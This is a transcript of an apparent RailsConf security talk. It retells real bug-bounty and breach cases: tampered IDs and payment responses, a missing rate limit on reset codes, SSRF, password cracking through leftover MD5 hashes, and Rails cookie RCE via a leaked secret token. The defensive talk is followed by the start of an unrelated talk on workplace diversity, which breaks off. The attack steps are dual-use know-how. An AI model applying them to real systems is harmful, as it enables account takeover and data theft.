bad code and these are all the things that are happening because of it. I don't know how well that went over, but this talk is kind of like that except this is all real. These all come from public disclosures, mostly from bug bounties, sometimes from people who didn't necessarily get a bounty out of it. I'm not picking on these companies at all. I like most of these companies and I'm sure they're great, especially Twitter since I work there. These are just the well done write ups that I could find so that I could share with you not just pick on Mike, but not just like there's SQL injection, but what actually happened. None of these are things that Rails will save you from, essentially. Let's start with Twitter. Like I said, I work there, so I feel like I can share this. It's public anyway, but just letting you know I'm not picking on them. Let's get into it. A researcher was looking around on our ad site and he noticed something that when you put in a credit card and we check it and we go, oh, that's not a valid credit card. You get this little modal and it's like, oh, you know, we weren't able to approve that card. Then you have two options of what to do with it. One is try again and the other one is dismiss. He noticed what happened when you hit dismiss, there's a method that gets a URL that gets hit. You can see there's the account ID and this is actually the bug bounty researcher's account. Then payment methods, handle failed, and then an ID. I'm starting off the talk. This is a Rails app we're talking about. You know that thing at the end is probably the ID for the payment method. He noticed what would happen is the payment method would go away. He's looking at this number. This is probably the ID of the payment method. What if I just changed it? Does that still work? Is that going to delete that payment method? Well, it turns out on the back end there was code that looked something like this where it looks up the payment method from the ID parameter and it deletes it. I still think when I was making these, I'm like, that's so weird that dismiss deletes it, but that's another thing. This is exactly what was happening. In the web security world, this would be considered an insecure direct object reference. It's a direct object reference because that ID is the row in the database. It's insecure because we're not checking that the person who's deleting that row actually owns that row. There's another term for this exact thing right here, which is an unscoped find. I don't think I came up with this term, but then I searched and it doesn't seem like anyone else uses it. In Rails, you can scope your finds or you could not scope them or you could unscope them. This is a find that wasn't scoped properly. The way you should do this is to scope it to the current user and then do your find for the payment method and then delete it. For this, we paid out $2,800. I'm fairly certain that was our largest bug bounty payout to date. Why? Because someone could delete all of our customer's payment cards and that's how Twitter makes money. It's from people paying for ads and you can imagine that would be a huge loss for us. Thankfully, they reported it to the bug bounty. We paid them $2,800. Next up, United. I put the links for later if you want to read the write-ups from the people who found these. In this case, there's a guy. United launched a bug bounty program, kind of famous because they're like, we'll reward you in reward miles, which is kind of not a lot of companies give you that. But then you have to fly United. So anyways, he was looking and what he was doing, he was just proxying the traffic from the mobile app just to see kind of what was going on. He noticed there was a request. Is that on the screen for you? Sorry, it's a little bit off. The details don't really matter. It's making a post request. I cut out some stuff, but he noticed in the request, there's MP number. So United, they have mileage plus or something like that. Yeah, okay. I don't fly them. So mileage plus number and he thought, oh, that's kind of like my user ID. What if I change that? You might notice a trend here. So he's just like, what if I change it to someone else's number? What would I get back? And he got back a whole bunch of information. I know this is kind of small, but I'm going to zoom in, including what flight they're on or what flight they're booked for, their name, where they're going. Is it late? When's it coming? When it's going? Every leg of the trip, there was a whole bunch of more information. Well he noticed in particular, there's a record locator and there's a last name. Any guesses as to why those might be important? Yes, exactly. So what do you do when you check into a flight? What do you do when you need to look up a flight and you didn't create an account on the airline's website? You put in your record locator and your last name. So the reporter, you found this. You can kind of see that. He noticed that, yeah, you can go on. All you need is that number and last name. And there's a list here of all the things you can do. Look at your reservations, change it, cancel it, get a receipt. Another thing he mentioned is you can see the person's emergency contact information. So whoever they put in for their emergency contact, you can see that. All you need is a confirmation number, last name. And you can look that up for any mileage plus member number. So that's pretty bad. There was some drama because he reported it to them and they didn't fix it for a long time and then he threatened to publicly disclose it and then suddenly it was fixed and they're like, no, no, no, we were working on it the whole time. And by the way, your report was a duplicate, so we're not giving you any money, which happens a lot in Bug Bounty and being on the other side, it just happens. But he didn't get any money for that. I guess it was a pretty obvious thing that other people found. All right, Domino's Pizza. I don't eat a lot of Domino's, but I seem to recall the name came from them having rectangular shaped pizzas, which they, like, do they even have those now? Oh, yeah, maybe? I don't think I'm that old that you don't remember square pizzas and I do. Not that old for sure. Okay. So again, someone was, actually in this case it was kind of interesting because he was actually looking for something else. He was curious how they generated, apparently sometimes on the mobile app they would give you like a random coupon for $10 off or something. And so he was actually looking for that, but what he found instead is the way the payment system worked was the phone actually handled the payments. So you put in your credit card number, it would send it to the payment processor. Payment processors look like this. You just kind of shove your credit card into your laptop screen. And then it would send back, okay, that was successful and here's sort of the transaction ID or the reference number for that credit card transaction and then the app would send it to Domino's with your order and then they would make your order for you. So he thought, right, and if there's a failure it just doesn't send it to Domino's, right? So he thought, oh yeah, I gotta tell you, there's some XML ahead. If you need to avert your gaze, it's fine. It's not that bad though. So this is what would come back from the payment processor. If it failed, let's say not authorized and then there was a reason, it was declined and then a status number and we assume seven means declined for some reason. So he thought, what did he think? What if I changed it? Yes, catching on. What if I just set that to success? As far as I know he didn't change anything else, just change it to success and then I'll send that on to Domino's. So it kind of looks like this, it failed but we're gonna just change that to success, send it to Domino's and then he had no idea if this would work, of course. So he checked his app and he sees, well, it says they're working on it but you know how mobile apps are. Maybe it's just like a UI thing or something. So he called them and said, hey, did you get an order from me? And they're like, yeah, we're working on it. We're gonna, we'll get it to you 30 minutes, whatever it was. And he felt kind of bad about it. He felt kind of bad about it so he did pay for it. When the guy showed up he was just like, oh, I think there was a mistake. Here's the money for it. So he didn't actually get a free pizza out of that. But in this case, it's simply that the server didn't check that what the client told it was true. It had the reference number from the payment processor. All it had to do was ask the payment processor, hey, I got this ID, was it successful? If they had just done that validation, no problem. And so a theme in the security world really is that you shouldn't trust anyone. And I was thinking about that because I thought I would just tell you don't trust anyone. But when you're building an application, you actually do have to trust some of the things that are sent to you, right, depending on where it comes from. So the main thing is you need to know, think about who you're trusting and what you're trusting and if you should, right? So unfortunately, you can't just trust no one. All right. So talk about Ashley Madison. I included their motto or tagline here because I think it's like a total logical fallacy. Life is short, so have an affair. It's like, well, life is short. So make your life even worse by ruining it. So they had a whole bunch of information stolen. I don't know how it was stolen. I'm not talking about how it was stolen. But part of what was stolen, database dumps and source code. But interestingly, not just source code, but Git repos, which is very interesting, right? It will become apparent in a moment why that's interesting. So in that, about 36 million passwords, however, they were hashed with B-crypt, which is maybe not like top of the state of the art, but pretty much recommended use B-crypt with, you know, decent work factor, which they were doing. So that was good. And at the time, not that long ago, but at the time, a lot of people were like, oh, okay, we got to start like trying to crack the B-crypted hashes so we can get the passwords. But there was a group that took a different approach. I got to warn you, though, again, even worse than last time, there is some PHP code ahead, but it's not that bad. I think you will survive. I almost rewrote it in Ruby, but it was actually kind of longer and I wanted to fit it on. So they found some code and it's calculating this login key. And we actually don't care what that was for. All we care about is the login key was in the database associated with a user. So they saw this code and they say, okay, well, it's an MD5 hash. That's a red flag. It's got the username and it's got the password in it. And for some reason, they're lower casing both of those, which just makes this whole thing worse. But they're encrypting it first. So now we're dealing with the hash of a B-crypted password, so that's not very useful if I'm trying to crack the passwords. So then they looked in the get history and they found that this code used to look like this. So it used to just hash the lower cased password directly. So that was pretty interesting because they knew the username and they knew the login key and they know how it's constructed. So now you can calculate, I believe it's billions of MD5 hashes a second. So this was a good place to start. There was another piece of code, though. And here LC means lower case where they were doing, and weirdly, this was also to calculate a login key. So who knows what was going on in the code base. But in this case, they had username, password, email, and then this secret key. But remember, we have all their database and all their source code, so the key is not secret, username is not secret, password is not secret. The only secret is the password. So this was another avenue that they decided they could use to try to crack these hashes. So they started doing this. About 2.5 million passwords were cracked. They didn't say exactly how long, but they said in a few hours they had this. And remember, there were all these other people who were trying to crack the B-crypt password, which would probably take years and years and years. So in a few hours, they had 2.5 million passwords. In a few days, I didn't follow up with all of it, but the second post they did, they said they had almost 12 million passwords that they had cracked. To be fair, and I don't have a link to that post, but you could probably find it, most of those passwords were pretty awful passwords. So this is, I think this is an interesting story because they were doing the right thing. They were using B-crypt for their storing their passwords. But then on the side, they were doing something with a much weaker hashing function. And that led, I mean, I guess I should say researchers and attackers to be able to crack the ones that were using the much stronger hash. And if you're paying attention, yes, they were lower casing the password, but most of the passwords were a lower case. But as the researchers were cracking them, if they found a hash that worked, then they would just try a few iterations of different capitalization, and they could pretty much get it fairly quickly. And then they compared those to make sure they could calculate the B-crypt hash, and so they could be like, yeah, these are actually the passwords. So don't use weak hashing algorithms. I know this example with the picture is not actually a hashing algorithm, but it's the idea, right? You're trying to hide something, and you kind of feel like you hit it, but you didn't really. So just avoid using MD5, avoid using SHA-1, use SHA-256 for this kind of thing. Well, not for passwords, but for things other than passwords. All right, Facebook. This one will be really quick. So you want to reset or you forgot your password on Facebook. So you go in and they say, OK, we're going to send you a six-digit code. You type in the code, we'll reset your password. Or actually, I don't know what happens after that, but we'll get you into your account. So six digits, how many possibilities is that? Yes, very quick, one million. So that's actually a reasonable number to just try all of them. So a researcher, just to let you know, for bug bounty and probably other security researchers, the forgot password flow is often a weak point in websites, because you're basically saying, I don't know the true credentials that I should be using to get into your site, so give me some other way to get in. And a lot of times, there's flaws in that. So he's looking at this and he hit it, and I don't know how many times he hit it, but it was rate limited. So he's like, well, OK, that's expected. But then he went over to another site that he happened to know about, which was Facebook's beta site. Well, it just happens to turn out that they did not have rate limiting on that site. So essentially, for any account that he knew, the username, email, or phone number, he could get into their account, because he just requests the code. It doesn't matter what the code, wherever that went, it doesn't really matter. And then you just sit there trying at most a million times in the absolute worst case, which you could do relatively quickly, especially compared to trying to brute force a password. So in this case, it's just straight up missing rate limit. Should have been a rate limit, there wasn't one. And interestingly, this is probably the simplest of all these examples, and yet he got the most money because the impact is, well, gee, I can get into anyone's Facebook account. So does anyone know how to pronounce this? So I say imager, I don't know. So imager, you upload photos or whatever, and people look at them and comment and upload or whatever. I'm saying that very casually, but I spend a lot of time on this site. Anyhow, they have this functionality where you can give them a URL to a video, and then they convert it to a GIF. I got to be honest, I'm a real introvert. I don't talk to a lot of people, so most words I only pronounce in my head. And then I have to get up and talk about something, and I say GIF, I'm sorry. So in any case, you point it at a video, like YouTube or something, and it will convert it to a GIF. And then you can show it on the site, right? So a researcher was looking at this, he noticed how it works. It hits some end point, and it passes in a URL. And then it goes and fetches that URL, of course. I mean, it's pretty simple functionality. Something like this. So you give imager a URL, and then it hits it, like maybe bit.ly or something. And this is called server side request forgery, because you're basically asking a server, like imager servers, to go and make a request to another server, essentially on your behalf. And you can use this for things like denial of service attacks, or any kind of attack where you'd like to hide behind someone else, or maybe they have way more bandwidth than you do, or maybe they have a trust relationship between the servers that you don't have. But that's not exactly what this is about. So the researcher was like, what if I changed that? What if instead of HTTP, I use SFTP? And I'll just set up a server, not bit.ly, but I'll set up some server where I can see the request that comes into my server, and just see what happens. So I set up using netcat, he's like, just listen on this port, see what comes in. One of the things that came in was, hey, I'm coming to do my SFTP or whatever. The string that comes in is like, oh, I'm a lib curl, and this is my version number. That's pretty useful information. And so what he did was he basically started trying all these different protocols, and essentially imager would just, whatever you gave it, it would just go and do. And I didn't go through the whole example, because from a security point it's not that interesting, but if you go read the post, which again I linked, and of course the slides will be available, he set up a server that it would hit with, I think it hit it with SFTP, but then he redirected them to a gopher URL, and tricked them into sending an SMTP request to another server. So he was actually using them to send mail through, I think it was mail.ru. So it's just kind of an overcomplicated example of what you could do with it. The main thing is you can make these requests and essentially use them as a proxy. You got $2,000 for that. I don't think I put the slide, but basically if you're not expecting to make these kinds of requests, you should be checking that you're not making these kinds of requests. So you got $2,000 for that. Last example, and I realize this is also Facebook, I'm not picking on them. So this came out a little bit ago. There was a lot of drama around it. I'm not going to talk about the drama or the causes or who may or may not have been at fault. I'm just going to talk about what he did, because it's just such a really interesting example of going from having some little bit of information research, well, anyways, why did I have to tell you? I'm going to tell you what happened. It's just a very interesting chain. So he's a bug bounty guy, he's a security researcher, someone tells them, hey, I saw on Instagram, they seem to have some kind of admin panel that's on the Internet. That's all I really know about it, but maybe you can check it out. So he starts, he starts looking around like, what is this, whatever. He ends up on GitHub, and he notices that this admin panel is actually open source. And you may notice something, which is this is totally a Rails app, right? Where it RailsConf, I'm bringing it back. Started with a Rails app, ending with a Rails app. So this is a Rails app. So he pokes around, there are well-known issues with the Rails apps, right? And he finds this. Yeah. All right, so you're well aware. So he finds the secret token, and honestly, like, is it bad that this is here, yes, but if you're probably the point to take away here is that if you're using an open source Rails application somewhere in your infrastructure, you should go and change this value, right? Okay. So he sees this, he's like, well, that's pretty good. And also, this is running Rails 3214, which is, I believe, from 2013. So pretty old. And he does some more research, it doesn't really matter, because we know in this room that Rails 3214 is a session cookie is signed, but it's code that has literally been marshaled to a string. But it's signed. And usually the signed part is kind of what keeps us safe, but he has the signing key. And when you un-marshall code, it's possible to execute code. If you've been around for a couple years, you probably remember 2013. So session cookie signed, marshaled code, and if you have the signing key, you essentially have remote code execution. Now if you read his blog post, I actually got a little confused, because the exploit he used was for Rails 3211, no, no, 32110, which was supposed to be fixed in 3211, but then he used it on 3214, so I have no idea what that means, but I'm just letting you know. But in some case, however he did it, he was able to create a forage session, server accepted it because he signed it with the correct key, they hadn't changed it from the open source repo, and he got a remote shell on the box. So at this point, like, honestly, he was done. And again, I'm not talking about the drama, but this is where it begins. So he has the remote shell, that's awesome. But what can he do? So he decides, well, there's a database for the web server, I'll just connect to it through my shell and see what's there. And what is there? Passwords are there. That's awesome. However, they're re-crypted, okay. Now there isn't like an MD5 bypass this time, instead what happens is he's like, well, whatever, like, I'll try cracking them anyway. You know, long shot, but I'll just try it. Well, like jackpot. So six of the passwords were just change me, so probably someone set up an account for someone and then they never changed their password. Three of them were the same as the user name, two of them were just the word password and one was the word Instagram, which makes me believe probably when he set up his cracking tool he seeded it with some of this information, right? So that's bad. He logged in just to show that he could, but then he's like, this isn't actually that interesting as a web app. He was talking about like, well, maybe I could like set off some pager duty alerts, but you know, not that interesting as an attacker. So then he starts poking around and he notices on that box, there are keys for AWS. And then so he goes to that box and on that box, there are more keys to other S3 buckets. And then he starts looking around and again, not talking about the drama, but you can see where some drama would come from. He starts seeing like, wow, there's like tons of stuff. Anything you could kind of imagine I can probably access. So this is all from using an open source Rails app that had the secret token in the source code. Yeah, secret in the source code, really old version of Rails. There were weak passwords, which he didn't use for anything except for logging in, but weak passwords. And then the keys were sitting on the servers, which like how you solve that, like I think that's like the worst or the least bad thing on this list, really. So he got $2500. I don't know if it was worth the drama that he went through. Again you can read that on the Internet. All right, so just to kind of summarize here of like, I'm sorry, it's kind of off to the side, but things you should do. Okay, so verify that the current user can do the thing that they're asking to do, that they can access the data they're asking to access. And I want to point out that like this is not just like from the web browser necessarily. If you're in like a service oriented architecture, you got to think about that too. Because again, think about who you're trusting. Think about who they're trusting. And never trust the client. So think about those trust relationships. Always try to use strong hashing algorithms. And I know like there's a strong temptation when you're like, well, this doesn't really matter. Like I'm just using it for this or like I'm not really hashing their password or something along those lines. You can use SHA-256. It's like super fast and strong. So just use that. Or important actions like logging in, confirming codes, any kind of action that is either someone can brute force something or even if it just causes you financial loss, put a rate limit on it. Don't put your secrets in your source code. And it's kind of a hard thing because you're like, well, but my source code's right here. And then like, well, where do I put my secrets and so on? But the thing is, if you have someone steal your source code, which happens because it happened to Ashley Madison, you don't want to have your secrets right there in the code. And certainly don't put them on GitHub, which it happens like all the time. So if you just don't have them in your source code, it's just not a problem. And then finally, I know it seems like such generic security advice, like always use strong passwords, but think about when you're at work and they're like, oh, we just set up this admin panel and here's a password or whatever. What if that admin panel ends up on the internet? You don't want to be the person who's using the password password. You're not going to feel good when your security team comes to you and says, by the way, someone just logged in with your account and your password was password. It's not a good time. Okay. People always ask about resources. I know people are asking Mike. He probably actually knows better. But if you're totally new to web vulnerabilities, check out the OWAS top 10. It is a good list. It's a very good reference. If you're looking for what should I do as opposed to what should I not do, there's a new OWAS top 10 of proactive security controls, which sounds very formal, but actually the documentation, it's very good to go through. It tells you things like think about who you trust and protect stuff and encrypt stuff. It's just kind of like a good checklist to go through. If you're looking for like hands-on, trying stuff out, the last two are actually from Invisium, but Rails go to an OWAS project. It's like a purposely vulnerable Rails application, but it also gives you hints of like, maybe you should try this or that. If you really want to, it will walk you through things. It's a good resource. And then also Invisium has these sec casts, which you do have to sign up for, but they're free. And they're a pretty good resource for Rails security and security in general, both on sort of defending against things and also trying to hack into stuff. All right. Okay. Made this slide. So like, I believe almost everyone at this conference is packing stickers to give away. So if you would like one of these three, I have them with me. After the next talk, we're going to have a security birds of a feather. I don't know where the, does anyone know where those are? Oh, the lunchroom? Okay. So. Okay. Great. So it's in the lunchroom zone A right after the next talk. So if you want to come and talk to us about more of this stuff. And if you live in the San Francisco Bay area, well, not if you live there, but if your company lives there, feel free to contact me if you want me to come and talk at your company. I'm happy to do that. And this is where you can find me on the Internet. Thank you. And yeah, so the question is, aren't those bug bounty payouts kind of low? And there's like, I can talk forever about bug bounties because it's a hard thing. Like what are things worth? And I mean, yeah, maybe you think it's low. Maybe they think it's high. You have to also consider like what's their budget for bug bounties? Of course, Facebook has a ton of money. And yeah, I mean, the guy, the other guy that did the Instagram thing, his whole thing was like, they should have paid me like a million dollars for this. So yeah, it's tough, honestly, because I've been a part of a couple bug bounty programs on the like receiving side. And it's very hard to think through like what's this worth, how much do we pay, how does it compare to other things that we've seen. And I mean, the thing is like, well, this could destroy our business. Can you really go to your finance department and be like, we'd like to pay them like half a million dollars. Like no one's going to go for that, right? Even if it could have wiped out their whole business. So yeah, so the question is, where do you put your secrets? Because someone has to actually use them at some point. I mean, there are products that will do it for you. Essentially, you want to store them somewhere and make sure that only the servers that actually need certain keys get those keys. That's basically the best you can do. And then you protect that store of keys. And the nice thing though is if you automate all that, then you can rotate them really easily, which is nice. But yeah, you basically just, you know, you got to put them somewhere and then make sure they're encrypted there and then make sure they only go to the boxes that need them and that access to that, you know, like you don't want someone using the Rails CVE that Mike mentioned to read those files if you can help it. Yeah, so the question is, even when you're doing it that way, like how do you securely transfer them between servers? I mean, I got to say, at some point you reach a point where you're like, okay, it's safe enough, you know, because really the main thing is them sitting on servers where they shouldn't be or being too widely available. You don't want everyone in your company to have access to the main keys. Of course, when you are transferring them, I mean, you could just use SCP or something and you'd have key lists. I mean, you'd be using SSH keys on the servers. Yeah. Or I mean, if you want, you can encrypt them and send them over SSH and decrypt them on the box. I mean, you know, but then you have, like you said, the next level, like, well, but then we have to share the key to decrypt it. And yeah. Yeah. Like I said, there are like kind of commercial solutions. There are also open source solutions, actually, you can look into. But yeah, honestly, it's just a hard problem. I think you just have to get to one where you're like, this is not our weakest point anymore. There's a question over here. I thought, no. Okay. All right. Well, thank you very much. I'll take it.
|
Rails comes with protection against SQL injection, cross site scripting, and cross site request forgery. It provides strong parameters and encrypted session cookies out of the box. What else is there to worry about? Unfortunately, security does not stop at the well-known vulnerabilities and even the most secure web framework cannot save you from everything. Let's take a deep dive into real world examples of security gone wrong!
|
10.5446/31494 (DOI)
|
What do you say we get started? I was like, okay, cool. Hey, I'm Tony, via Chorek. I'm here to talk today about practical ways to advocate for diversity at work. I've been A.B. testing the title of this talk, so sometimes I call it straight white men should advocate for diversity at work. Like any good A.B. test, I only had very few sample size, so it's been accepted in both ways. But I think diversity is something that we should all care about, not just people of color and women. It's very important for our businesses. So I'll talk today about why I think that. So here's my husband and I, my husband's in the front row right here, at Chicago O'Hare International Airport. Does anybody recognize the guy with the arrow pointing to him? Yes, I heard Santorum. That's Pennsylvania Senator Rick Santorum, who is particularly vitriolic and hateful in his speech, right? Before Trump was Trump, he was Trump. And we do what you do at an airport, which is you grab your Starbucks or your coffee, and you wander in a haze at the airport. You find a seat next to someone, you sit down, and we just happen to sit down next to Santorum. And he was giving a radio interview on the phone. So I don't know to who. But he was being really hateful that day, saying things about gay families with an earshot of my husband and I and our nephews, saying how we're destroying America, that women's place is in the home. I mean, all these really ridiculous things. And I'm just getting angrier and angrier. I'm getting angry just talking about it, thinking about it right now. And I wait for him to finish, and he gets off the phone and I say, how dare you? Like, I walk off to him, right behind me. How dare you talk about me and my family that way? We're not destroying America. We're not hurting you. I'm an American just like you are. Why are you talking about us this way? He gives me a very political answer. He says, thanks for your vote and gives me a thumbs up, which only makes me more and more mad. He starts walking away, and I notice the people around us have gotten up and are moving away from us. They're afraid of what's going to happen. They're not going to be able to get on their flight. They're scared of what we might do. So I, in a moment of anger, I remind him of the meme, the internet meme, that made his name so very, very famous. Don't look it up right now. And I like to think that that got him. I don't know. We'll see. But I like telling the story because this is the kind of America that I live in. A lot of people live in, right? Boston, Massachusetts right now. Very progressive city in a very, very liberal state. We had marriage equality way before. A lot of other states did. And we're constantly on the forefront of social issues. But I travel and I meet people like Santorum and in the airport randomly. I turn on the television and I hear Trump talking about families, about people that I care about in certain ways. It's awful. So how much more awful do you think it would be to have this in your day life and then go to work and hear the same kinds of jokes? Maybe not quite in such a hateful way, but they constantly dig at you day after day, right? That's the experience a lot of people of color and women have at work and during culture. And I want to change that. So this is my attempt at doing that. A little bit about me. I went to undergraduate school at WPI in Worcester, Massachusetts. And then went to graduate school at Tufts. All right. So I got my graduate degree from Tufts University in engineering management. I interned at NASA in high school. My first job out of college was at the Free Software Foundation, where I was the personal assistant for Richard Stallman. So after they just come talk to me, I have lots of great stories about that. And then I really got my education in engineering from Zipcar, where I was for four and a half years. How many people here have driven in a Zipcar or knows what it is? Okay. Good. You've used my software. It's great. I was there while we were growing. I was one of the first eight engineers, a small team there. And then we grew to 50 engineers. We acquired two companies. We went IPO, and then we ourselves were acquired by Avis all in that time that I was there. And I learned a lot about engineering at Zipcar. Currently, I work at a company called LocalLytics. We build software that's in all of your phones right now. It's an SDK that companies can install to see what users in aggregate are doing in their apps to build better apps, build better features. We work with companies from the New York Times to HBO, SoundCloud, and our software is installed in over two and a half billion with a B, devices around the world, processing terabyte to data a day coming into our systems. And we work across Ruby, Scala, JavaScript, and a few other languages. And I manage a team of 11 engineers who are across all those languages there. And I hire a lot for our company. And I found that the single biggest challenge of building a company, especially in Boston, is hiring the best people. And everyone says this, right? But what's that word best? That's the word I want to concentrate on. And for me, best means hiring a diverse workforce. People from different educational backgrounds, people of different genders, people of different colors, races, ethnicities. And I think that way... Here's a demonstration of why I think that way. Kate Hedlston has this fantastic series of blogs where she talks about this, that the productivity of your team is a product of how well they work together and the sum of the individual talent of the team. I think all too often engineering groups focus just on the sum of the talent part of that. They talk about 10x engineers, and that's why they talk about it that way. But I like talking, as other people do, about 10x teams. And this is why, right? The better the team works together, the more productivity I'm going to get out of everyone. And for me, a diverse team is a team that works better together, and there's research that backs this up. Here's some research from the Scientific American that teams... Diverse teams prepare better, anticipate alternative viewpoints, and they know that reaching consensus is going to take work to achieve. That to me is the process of developing a product of engineers getting together to build software that helps people and helps companies build better apps. That's the essence of why diversity for me is important. But I mentioned I manage 11 engineers, right? And that means every week I have a 30-minute 101 with each one of them, where I give them on the right, I try to give them, and here's one of them, he's right in the front row too, so tell me if I don't do this for you, but give you clear, frequent, and tough feedback. That's how you grow as an engineer, but the way that you're going to best receive that is if you also believe that I care about you as a person. I'm not just telling you that tough feedback because you're replaceable, and if you don't achieve that, I can replace the cognitive machine, right? I mean, that's a lot of engineering departments operate that way, or people feel like they do. So I celebrate everyone on my team as a whole and diverse person. Does that make sense to people? Yeah, okay. I want to lead you through five ways that I've found or practical ways you can advocate at work for diversity. Measure, fund, raise, call out, and recruit. And I'll preface this by saying I'm not an expert in this. I wanted to share my experiences because that's how I think we all learn better that way. I work for a company who's one of our major products is analytics. We tell people what you do in their apps, and so I'm used to using data to make the problem clear. You can see at the top, the gray bars at the top is the US population distribution. This is from a few years ago. And how the major tech companies in America are lined up with those gender and ethnic distributions. So you can see the gender distribution, we know that it's not a secret, right? That the gender distribution in all of our companies is out of whack. As are the representation of Latino and Black employees, especially. And companies these days from Google, Yahoo, Pinterest, Etsy, right, they released their gender and ethnicity breakdowns. So I said, oh, this is great. I want to do this at Localytics. But our company is 250 people, nowhere near the size where we have an HR department who knows how to conduct a survey. How do I conduct a survey with some really sensitive questions in it, right? Where are some techniques I couldn't really find a lot of information? So I pieced together a survey for our company and I open sourced it so people can run these kinds of surveys at their own companies. Our first decision was how do we ask people what ethnicity and race you are? It's a very complex question. A lot of people identify as many of these or several of these. And it's also a very personal question. So we settled on a government form called the EEO-1, very official sounding, right? But any company of a certain size has to fill this form out of their employee makeup. And we thought that using the same categorizations for ethnicity and race would give us at least a benchmark that we could use. We also wanted to be cognizant that people identify as in gender in different ways, right? So we wanted to not have it be a binary choice and have it be a right in field, but people identify however they wanted. On the back end, when we got the data in an anonymized fashion, this did mean we had to massage the data a little bit, right? And because people would put an M when they meant male, so we had to assume and guess what they meant. But it turned out not to be a big deal. And because we're only 250 people, we didn't, and we wanted to release the data in an anonymous fashion, we didn't want to have it be super identifiable. We didn't want people to look at it and say, oh, I guess that's that person answering that question. And so when it came to GLBT affiliation, we chose just do you identify with any of these terms or not. Because we thought if we dove down into it, it would be too identifying. I really wish that this next slide that I showed you was a result of how we're doing awesome, right? How the gender breakdown of locality is world-class, matches the U.S. population, same thing for ethnicity, and unfortunately that's not the case. We look just like this slide from Google. We suffer, we struggle with the same problems a lot of companies do, except we're trying to do something about it, and that's really what this talks about. But I feel like at a tech conference I should show, okay, here's the result we got, right? We're spectacular for this reason. We also, we fund local groups at Localitics in an effort to raise awareness for it. I'm used to getting in my inbox every week, Ruby Weekly, D.B. Weekly. Anybody subscribe to these like weekly tech email newsletters? There wasn't one for diversity that I found. There's Model View Culture, which is a fantastic publication. I think they're actually print and online. But what I started was diversityhackers.com. This is every Tuesday morning, you sign up, you go to diversityhackers.com. I will send you a curated list of five articles from that week. That week's news in diversity, practical tips that you can use in your company, how other companies are pushing this problem. We recently were sponsored by Buffer, the social media app. They wrote about us on their blog. So it's been growing every week. I encourage all of you to sign up for it and give me some feedback of what kind of articles you want to hear about. So we also support local women's groups in Boston. This one is called She Geeks Out. You can see on the bottom right there we made little shot glasses for everyone to take home. We bought dinner for this group. It's about 150 women. This is the offices, our old offices in Boston. They showed up and we had a speaker present. On the left, that's Sarah Rakowitz. She was the senior product manager at Localytics. She talked about techniques to build a product and how we build it at Localytics. On the right, that's Diane Hessen. She's the CEO of the Startup Institute. She talked about founding your own company as a woman, especially in Boston, techniques and trips that she's found. It was a feel-good event. Everyone had a great time. We had some fantastic barbecue. Although now I'm in Kansas City, I can't really compare, I guess. More than just a feel-good event, I put my recruiter hat on and I said that was 150 women who came into our offices, saw what it was like to work at Localytics, and we got several warm leads of people reaching out to us afterwards saying, how can I come work for your company? That to me, if I'm not doing that every week, I'm not doing my job as a manager, really, encouraging people to come work for our company. Another thing I tried was starting my own monthly meetup in Boston. There weren't any groups for gay engineers, LGBT engineers to meet up, so I started one called Code Pride. Again, if I don't hear this from people about Localytics, that I was interested in Localytics before, but I'm way more excited now that you host Code Pride, that's part of my job as an engineering manager is to want people to want to work for us. Another practical way that you can advocate for diversity is by letting other people know that it's important to you. I started at Localytics about a year and a half ago, and the second week on the job, I didn't know anybody. They bussed us all two hours away from Boston to a casino for an offsite, a company offsite for three days. Very, very nervous, and the whole thing started off with a three-hour event where the CEO laid out the vision for the company for the next three years, and then we had an open question and answer period. So you can imagine all 250 people in a room, people are sort of lobbing softballs at the CEO. That's what you do in a big company organization like that. And then I let a few people ask some questions, and then I ask the CEO, what are you doing to increase diversity among the management at Localytics and among the companies as a whole? And I don't think he was expecting that kind of question. He's a person of colour himself. He's of Indian descent. So we said, obviously I care personally about this issue, and it's important for our company to hire a diverse workforce, but then he did something very unexpected. He turned the microphone back on me and said, Tony, what are you going to do about it? And I paused, and I stammered my way through an answer, and I said, you know what, that's... Raj, thanks for giving me that opportunity. He did what all good leaders do, which is... He didn't have an answer, but he wanted me to take leadership position at Localytics to show them how diversity could be different here at the company. It was nerve-wracking, I got to tell you, and it probably would be for a lot of people in this room to stand up and say, like, this is important to me, especially in front of the whole company, but the best leaders, the companies you want to work for, the companies that accept that and want to help you change the culture. But it's also important to talk about this because the perception among engineers is not equal to the reality that a lot of women and people of colour face. This is research from Lean In, Cheryl Sandberg's Foundation. 72% of men responded that they think women have the same opportunities as men in the workplace. This doesn't sound right, right, because women on the whole in the United States make less than men. What I was surprising to me is that 16% of people said they have more opportunities than men. We hear this daily from engineers who are leaving, not just leaving your company, but leaving the industry as a whole. There's a problem here, and there's a perception gap. So it's important that you talk about this to your fellow engineers and to your management, that this is a problem. An easy way that you could raise awareness for diversity at work is something like your conference room names. We recently moved to a brand new beautiful office in downtown Boston that was built out specifically for our company. So we had to rename all the conference rooms. What an easy opportunity for us to name them after women and LGBT engineers who made a fantastic contribution to the industry. These are names familiar to a lot of us here, Margaret Hamilton, Grace Hopper, Alan Turing. But think about other departments who also book these conference rooms who don't know who these people are. Every time they book a conference in Grace Hopper, it's an opportunity to talk about why she's important to our industry and to engineering in general. You can even include it in the description of the room name. I mean, it's not hard to sort of subtly reinforce that people of all stripes and colors and backgrounds are accepted here at Localytics. So another thing that happens at work is people tell jokes, or they say things that make people feel uncomfortable. And so I can talk through some techniques I use to call that out when I hear that happen at work. Growing up, I thought mayonnaise came with tuna fish in the jar. I'm the oldest of six kids. We grew up in a small house in Baltimore City. Tuna fish sandwiches were a popular snack of ours. So we would get out the can of tuna fish, get out the mayonnaise, put it between two slices of bread. And I thought, why do I have to make this when the mayonnaise jar comes with tuna fish inside the jar already? And of course it doesn't, right? But that's because the laziness of my brothers and sisters and I, that every time we would double dip and add more mayonnaise, we would leave tuna fish behind in the jar, okay? What a great metaphor for our engineering cultures. The things that seem like that's, oh, they've always been that way, or that's how it has to be, right? It's actually a result of people not explaining their worldview or being lazy about certain things, right? When I was making the slide, you can't find a stock photo of tuna fish in a mayonnaise jar, so I had a little photo shoot. And I bought a jar of mayonnaise and I bought some tuna fish, and my husband had this disgusted look on his face as I was doing it. It's kind of gross, right? And I said, good, we should all be so disgusted at the current state of our engineering culture when it comes to diversity. How many people are familiar with this tool, this SBI tool? Anybody heard this before? One person, two people, three of them. It's a technique when talking about sensitive subjects, or subjects that people can get really offended at or defensive with, giving them feedback in a way that still makes you heard. So there's this thing that happened at work where we have a pull-up bar, you know, like you can do pull-ups on it, which is a very macho thing in the first place. Probably doesn't have any room in our company anymore, but a couple of people from a different 